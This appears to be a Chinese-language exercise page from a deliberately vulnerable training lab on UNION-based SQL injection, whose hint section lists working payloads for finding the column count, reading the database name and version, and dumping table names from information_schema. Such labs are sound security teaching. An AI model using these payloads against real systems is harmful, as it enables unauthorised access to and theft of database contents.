A-02 联合查询注入
故意设计的安全漏洞🔍 按用户名搜索
💡 提示
先确定列数: ?username=' ORDER BY 5--
联合查询: ?username=' UNION SELECT 1,2,3,4--
提取数据库: ?username=' UNION SELECT 1,database(),version(),4--
提取表名: ?username=' UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--